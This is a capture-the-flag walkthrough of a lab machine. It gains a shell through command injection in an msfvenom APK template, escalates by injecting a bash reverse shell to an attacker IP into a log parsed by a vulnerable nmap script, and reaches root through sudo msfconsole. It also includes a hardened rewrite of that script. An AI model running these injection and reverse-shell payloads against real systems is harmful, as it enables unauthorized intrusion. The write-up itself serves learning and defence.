So we have SSH on port 22 and a Werkzeug httpd server on port 5000.
2. Web Enumeration:
Got this interesting page …
It offers a few functions: searchsploit lookups, nmap scans of IPs, and generating Metasploit payloads!
The interesting part: when generating any Windows or Linux payload, the result is written to /static/payloads/name.exe, from where it can be downloaded:
We can also provide a template for the payload type we are going to generate:
APK templates are allowed, and after some googling we found a Metasploit exploit module for APK templates that uses command injection:
so let’s generate an apk file and use it as our template:
use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
copy the file to your working directory: cp /home/'username'/.msf4/local/msf.apk .
let’s make payload with the site:
choose android, your lhost IP (tun0) and the template we made (the malicious apk)
open a netcat listener on the port we chose earlier in the apk (4444) - do this step before generating the payload
$ nc -lvnp 4444
And here we get a shell as user kid and the user flag …
note: once you hit generate you will get the shell on your nc listener
3. Privilege Escalation:
Rooting:
let's look around the filesystem …
interesting script with lots of permissions …
let's view it: cat scanlosers.sh
#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/
# third space-separated field onwards is treated as the IP and spliced into a sh -c string
cat $log | cut -d' ' -f3- | sort -u | while read ip; do sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done
# empty the log once it has been processed
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
-d' ' means a single space is used as the field separator, and -f3- means the IP starts at the 3rd field (everything from there to the end of the line is kept).
It's a bash script that runs an nmap scan over the IPs logged in /home/kid/logs/hackers. The "IP" field is never validated and lands inside a sh -c string, so if we can inject our reverse shell payload into that file and comment out the rest of the line to escape the parsing, it will be executed by scanlosers.sh and we will get a root shell..
our payload:
echo "A A ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.17.34/9001 0>&1' #" >> hackers
'#' comments out the rest of the nmap command, so the trailing 2>&1 >/dev/null redirection never applies to our command …
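The root cause above is that whatever sits in the log line after the second space is spliced verbatim into a sh -c string. The following rewrite, an added example and not the script from the box, shows the defensive fix: take only the third field, accept it only if it is a well-formed IPv4 address, and hand it to nmap as a separate argument so no shell ever re-parses it. Rejected lines are reported on stderr, which is also where an injection attempt like the one above would show up. The log format (IP in the third space-separated field) and the SCANLOSERS_LOG / SCANLOSERS_OUT variables are assumptions made for this example.

```shell
#!/bin/sh
# Hardened rewrite of scanlosers.sh (added example; not the box's original file).
# Assumptions: each log line is "<field1> <field2> <ip> ..." with the IP in the
# third space-separated field, as the original cut -d' ' -f3- implies; the paths
# are overridable so the functions can be exercised without the real files.
log=${SCANLOSERS_LOG:-/home/kid/logs/hackers}
outdir=${SCANLOSERS_OUT:-/home/pwn/recon}

# valid_ipv4 ADDR: succeed only if ADDR is a dotted quad with octets 0-255.
# Anything else (a shell fragment, "256.1.1.1", "1.2.3", "1..2.3") is rejected.
valid_ipv4() {
    case $1 in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;   # digits and single dots only
    esac
    IFS=.
    set -- $1                                 # split into octets (no glob chars possible)
    unset IFS
    [ $# -eq 4 ] || return 1
    for octet in "$@"; do
        [ ${#octet} -le 3 ] || return 1       # keeps "0256" away from the -le test
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# extract_targets < LOG: print each distinct valid IP taken from the third
# field; report every other line on stderr and let nothing else through.
extract_targets() {
    while IFS=' ' read -r f1 f2 ip rest; do
        [ -n "$f1$f2$ip$rest" ] || continue   # skip blank lines
        if valid_ipv4 "$ip"; then
            printf '%s\n' "$ip"
        else
            printf 'scanlosers: rejected log line: %s %s %s %s\n' \
                "$f1" "$f2" "$ip" "$rest" >&2
        fi
    done | sort -u
}

# scan_target IP: nmap receives the IP as its own argv entry, so there is no
# sh -c string for an attacker-controlled field to break out of.
scan_target() {
    nmap --top-ports 10 -oN "$outdir/$1.nmap" "$1" >/dev/null 2>&1
}

main() {
    [ -r "$log" ] || return 1
    mkdir -p "$outdir" || return 1
    extract_targets < "$log" | while read -r ip; do
        scan_target "$ip" &
    done
    # Truncate the log only after every line has been consumed, like the original.
    : > "$log"
}

# Only run the scan when the real log exists; the functions above stand on their own.
if [ -r "$log" ]; then
    main
fi
```

Compared with the original, two things changed: the field is validated as data rather than trusted as a command fragment, and nmap is exec'd directly instead of through sh -c. Either change alone would have blocked the payload shown above; together they also make it harmless if someone later re-adds a shell wrapper.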
nc -lvnp 9001
And we got a shell as user pwn.. not root yet!
Trying sudo -l works without a password:
(root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole » this means we can run msfconsole as root
sudo /opt/metasploit-framework-6.0.9/msfconsole
from inside msfconsole we can cd to the root directory and view the root.txt flag: